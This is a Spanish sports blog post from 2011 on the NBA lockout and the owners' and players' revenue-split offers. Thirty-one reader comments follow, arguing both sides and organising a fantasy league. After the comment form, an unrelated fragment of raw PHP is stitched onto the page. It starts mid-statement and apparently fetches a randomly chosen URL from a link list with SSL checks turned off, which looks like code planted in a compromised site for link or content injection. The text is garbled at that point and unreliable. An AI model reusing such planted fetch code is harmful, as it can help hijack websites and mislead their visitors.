Lockout: Primer ultimátum

10 de October de 2011 por Jose_Dantley

Hemos llegado a donde no se debería haber llegado. Aunque resulta una obvia contradicción de términos, tenemos hoy lunes el primer ultimátum. En teoría un ultimátum debe ser ya la última opción, pero en este caso, este primer ultimátum marca la línea entre una liga regular de 82 partidos y otra acortada al menos en dos semanas, según las palabras de David Stern.

La liga ha ofrecido un reparto de ingresos 50/50. Los jugadores no aceptan menos del 53%. En este punto, los propietarios parecen –probablemente solo parecen- más unánimes en cuanto a la oferta que los jugadores. Los que tienen un contrato en el extranjero, parecen limitarse a esperar acontecimientos y algunos como Kobe Bryant, LeBron James o Kevin Garnett parecen estar dispuestos a aguantar ese 3 por ciento de diferencia, que traducido a dólares supone algo más de 100 millones en un año. El verdadero problema está en los muchos jugadores de sueldos relativamente bajos que pueden comenzar a ponerse nerviosos. Para ellos, pasar de percibir un millón de dólares a ganar poco más de 900.000 no es el verdadero quebradero de cabeza; lo sería que se suspendiera la temporada y se tuvieran que buscar a la carrera trabajos en equipos de mala muerte dada la competencia de figuras que no encontrarían dificultad alguna en fichar por equipos más dignos. Esa presión puede pasar factura a los jugadores. Por otro lado, cada partido que no se juegue es salario que no recibirían, por lo que pueden estar peleando por una diferencia que en realidad van a perder si la liga comenzara, digamos, en enero. Los propietarios también perderían, lógicamente, pero sus bolsillos parecen más profundos. Han aceptado no incorporar un tope salarial duro, pero con eso ya contaban; han aceptado subir la oferta inicial de reparto, pero en realidad los jugadores aceptan ya casi un 10% menos de lo que ganaban. Ahora les toca jugar a que la otra parte se desespere.

Mientras, cada vez son más los jugadores que están tomando medidas preventivas. Algunos tratan de ponerse en forma con partidos que harían palidecer al 90% de los partidos de la liga, como el “Amigos de Wade” frente a “Amigos de LeBron” con Chris Paul, Chris Bosh, John Wall o Carmelo Anthony –con victoria 141-140 para Wade. Algunos más retornan temporalmente a sus países de origen como Parker y Kirilenko. Por su parte, Kobe tontea con la Virtus o más bien al revés, y otros simplemente entrenan, como los hermanos Gasol, enfundados -para provocar sueños húmedos en algún que otro lector blaugrana- con la ropa de entrenamiento del FC Barcelona o como Calderón que pudiera dedicarse a saborear la buena cocina extremeña desde más cerca.

Todo apunta a que seamos optimistas para que la solución se produzca ya –apostamos por un 51% y alguna concesión menor- o que, como muy tarde la liga comenzara en diciembre. Crucemos los dedos.

Comenta

31 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Qué avariciosos son los propietarios. Solo se puede decir eso. Los que dan fama a la liga son Allen, Kobe, Griffin, Durant, etc. Ellos lo unico que hacen es gestionar sus contratos. Vergonzoso que la liga no empiece por 100 putos millones… en fin

      Citar

  2. TheDeerHunter dice:
    #2

    Yo creo que es vergonzoso por ambos lados.
    A la liga le dan fama las estrellas, pero la infraestructura y los riesgos asociados (pérdidas) corre a cuenta de los propietarios.
    No parece que el 50-50 tenga que ser un obstáculo insalvable… y si lo llega a ser los malos van a ser los jugadores.

      Citar

  3. Txusma dice:
    #3

    Si nos fijamos en el convenio que tenían los únicos que han cedido en algo son los jugadores. Aunque bien pensado los propietarios ya entraron en la negociación diciendo que lo único que buscaban era sacar más pasta.

    Como ya comentamos en el twitter, el salario medio de un jugador en la NBA es la suma del salario medio de un jugador en la NFL y en la MBL. ¿Están sobrepagados los jugadores?

      Citar

  4. HisRoyalAirness dice:
    #4

    Yo estoy con los propietarios, no porque me caigan mejor ni porque no sea consciente de que sólo quieren pasta: no se lo ocultan a nadie. Es su empresa y quieren sacar beneficios, punto.

    Eso de que los jugadores no han cedido nada no lo veo así, ellos vienen de un convenio muy favorable en el que se llevan lo que se llevan, un convenio excesivo con una cantidad de excepciones para el límite salarial que da risa; los que tienen que ceder son ellos. Ellos cobran su contrato pase lo que pase y rindan lo que rindan, los propietarios asumen las pérdidas y los “descansos” de muchas de sus estrellitas que se traducen en el no cumplimiento de objetivos.
    Los propietarios ya han renunciado al “hard cap” y a los contratos máximos, que eran peticiones lógicas. Es una absoluta barbaridad lo que cobran los jugadores.

    Y aún encima ahora van a lanzar un mensaje por las redes sociales llamado “Dejadnos jugar”. Queréis jugar? Aceptad el 50-50 y santas pascuas.

    Lo que me extraña un poco es que las marcas comerciales no metan presión porque Nike, Taco Bell, Sprite o BBVA pierden una barbaridad de imagen si no se juegan partidos

      Citar

  5. Txusma dice:
    #5

    Es culpa de Rashard Lewis cobrar lo que cobra o es culpa del GM de los Magic?

      Citar

  6. -=TheKing=- dice:
    #6

    Que dejen los porcentajes como estan, pero que incluyan clausulas en el contrato, cobras tanto jugando al nivel estadístico, si bajas, baja el sueldo, no es razonable que un jugador cobre lo mismo con un rendimiento que con otro, estando sano, claro está.

    No puede ser porque el propietario invierte mucho y los juegadores se lo tienen que compensar con rendimiento, si no la gente no va y no gasta y el no gana nada solo pierde pasta.

    Cuanta pasta perdieron los Wizars con Arenas, los Pacers con la sancion de Artest……

      Citar

  7. HisRoyalAirness dice:
    #7

    Txusma la culpa es del GM pero él está condicionado por el no control de los sueldos y es oferta y demanda, si no los pagaba él en ese momento los pagaba otro. Si se quieren hacer equipos competitivos no queda más remedio y así salen ganando los de siempre.

    Y ya están en twitter con el “let us play” que me parece lamentable. Durant escribiendo esto: “They locked us out from playing the game we love”.
    Me parece una hipocresía asquerosa y más viniendo de los mejor pagados

      Citar

  8. Sancho88 dice:
    #8

    Creo que por hoy, no sacamos conclusiones en la reunión de TJNBA. Tendremos que volver mañana, a ver si acercamos posturas porque si no los que no empezamos la temporada somos nosotros, jeje.

      Citar

  9. HisRoyalAirness dice:
    #9

    jajaja cierto

    (que conste que les ha salido el tiro por la culata a los jugadores, la gente los está poniendo a parir por el “let us play”)

      Citar

  10. TheDeerHunter dice:
    #10

    En fin… a la mierda las dos primeras jornadas. Vaya cagada.

      Citar

  11. Sancho88 dice:
    #11

    Voy a proponer una frikada. Nos hacemos una liga de hoops? joder, es que no recuerdo exactamente donde se jugaba eso, pero era con draft real, con temporada y tal. ya sé que no se puede hacer sin los jugadores, pero ahora que lo cancelan por dos semanas tendremos tiempo para crear esa liga, con 30 equipos reales (con los usuarios de tjnba que comentamos se podría hacer perfectamente).

    Qué os parece?

      Citar

  12. TheDeerHunter dice:
    #12

    Yo he jugado alguna los últimos años. Si la montamos me apuntaré.

    Lo único es que sin haber liga en el horizonte parece como que apetece poco ahora mismo…

      Citar

  13. Txusma dice:
    #13

    Estoy tan desesperado por el hecho de no haber liga NBA que he vuelto al Supermanager de la ACB!!

    Sobre el conflicto. Por lo que he leído por ahí, los propietarios siguen apretando las tuercas:

    – Los contratos no podrían durar más de cuatro años para jugadores que volvieran a firmar por sus equipos actuales y tres años para los que firmaran por otros equipos.
    – La midlevel exception para agentes libres pasaría de 5,8 millones de dólares a tres.
    – Impuesto de lujo más severo para los equipos que superen el límite salarial. Además, las franquicias no podrían pagar el impuesto de lujo más de dos veces en cinco años.
    – Reducción del BRI del 57% actual para los jugadores a una cantidad que rondaría el 50%.

    Veamos, teníamos un convenio que firmaron ambas partes en su momento y llegamos a esta situación pq los propietarios dijeron que empezaban a no salirse las cuentas y que la mayoría de equipos perdía dinero. Es decir, los que se plantan son los propietarios que entran con un montón de exigencias. Creo que la única exigencia que han abandonado es la del límite salarial duro, el resto sigue sobre la mesa. En cambio los jugadores ya han aceptado bajar del 57% al 53% del BRI. Que yo sepa, en una negociación ambas partes han de ceder y en esta negociación veo a los propietarios en “modo cuchillo”.

      Citar

  14. M dice:
    #14

    Yo creo que en la situación de crisis global, el mantenimiento de una liga viable para el futuro pasa por recortar gastos, y los de unos jugadores muy bien pagados no me parecen intocables. Aunque estoy de acuerdo con que algunos contratos firmados simplemente hace un año, muestran una desorientación total en los GM. La solución pasa por un reparto mejor entre los propios jugadores, más que en el porcentaje que van a cobrar. Pero claro, a la larga (y a la corta…) esto es inviable, porque cualquier franquicia quiere poner mucho más dinero en la estrella a la que confía su futuro deportivo y económico. No entiendo las pretensiones de los jugadores, en fin.

      Citar

  15. Blade Petrovic dice:
    #15

    apuesto a qe se qedara en 52%

      Citar

  16. Jose_Dantley dice:
    #16

    Esa midlevel va a causar muchos trastornos. El tema de la duración no creo que se consiga por los propietarios.

    Creo que seguirán cediendo algo más los jugadores y que ha podido el orgullo y la seguridad de que los propietarios te están llevando a su terreno.

    Siguen negociando, así que creo que se resolverá pronto.

      Citar

  17. HisRoyalAirness dice:
    #17

    También hay que tener en cuenta que el convenio del 98 lo firmaron los propietarios saliendo mal parados y con el agua al cuello. No fue justo ni de lejos.

    Me apunto de cabeza a la liga de hoops!

      Citar

  18. infante dice:
    #18

    vais a echar una liga? me interesa, pero alguien tendria que explicarme un poco como va la cosa y tal, que no ando muy puesto.
    llevo siguiendoos desde hace un año, y me encanta todo esto, sois unos cracks

      Citar

  19. JHC dice:
    #19

    yo voy de cabeza tambn a la liga Hoops!

      Citar

  20. CAMPO2 dice:
    #20

    Yo tambien me apunto

      Citar

  21. CAMPO2 dice:
    #21

    Una pregunta sobre Lockout, si se cancela el resto de la temporada, que ocurrira con el Draft 2012? la siguiente temporada, se juntarían dos generaciones de Rookies para competir por ROY?

      Citar

  22. telekoman dice:
    #22

    CAMPO2:
    Una pregunta sobre Lockout, si se cancela el resto de la temporada, que ocurrira con el Draft 2012? la siguiente temporada, se juntarían dos generaciones de Rookies para competir por ROY?

    La pregunta es buena. Yo le añadiría otra pregunta más. Si no hay temporada ¿cómo van a decidir el orden del elección del draft?

      Citar

  23. Txusma dice:
    #23

    En estos casos creo que podemos fijarnos en la NHL que vio como hace unos años se suspendía toda la temporada. Las 2 generaciones compitieron por llevarse el ROY y el orden creo que lo decidieron con un sorteo donde entraron todas las franquicias pero en el que se tenían en cuenta los resultados de los últimos 3 o 5 años.

      Citar

  24. Sancho88 dice:
    #24

    No hombre, no lo veais tan pesimista. Creo que por primera vez los republicanos le van a dar la razón en algo a Obama. El lunes tenemos liga (después de las predicciones que se han acertado aquí, yo me la juego con esta, jeje. Hay un antes y un después en el mundo de las predicciones arriesgadas desde la victoria de Macedonia contra Lituania).

    El lunes tenemos liga y el martes liga hoops. Yo me pido ser los Palencia Urogallos, jajaja

      Citar

  25. Blade Petrovic dice:
    #25

    yo puedo meterme en lo de la liga hoops

      Citar

  26. TheDeerHunter dice:
    #26

    He creado la liga… en principio para 24 equipos. Si hubiera problemas lo abriría a más.

    La liga se llama Blog_TJNBA y el pass es tj32

    De cualquier modo, hasta que no haya noticias del fin del lockout no sé si podremos empezar a hacer nada, a parte de reclutar equipos

      Citar

  27. Txusma dice:
    #27

    Os informo que es posible que os podamos ofrecer algo 1000 veces mejor que una Hoops. Permaneced a la espera… 😉

      Citar

  28. Sancho88 dice:
    #28

    Podeis poner el enlace para ir a la liga? aunque sea el de la página web? es que hace mil años que no juego a hoops y no recuerdo realmente donde había que entrar. asias!!

      Citar

  29. TheDeerHunter dice:
    #29

      Citar

  30. Killer31 dice:
    #30

    Es la primera vez que me animo a escribir, aunque os sigo habitualmente. Si no os importa, y viendo que os faltan algunas personas para completar la liga hoops, me apunto 😉
    Y roto ya el hielo, igual me animo a escribir más a menudo. Saludos

      Citar

  31. TheDeerHunter dice:
    #31

    Genial, bienvenido killer…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>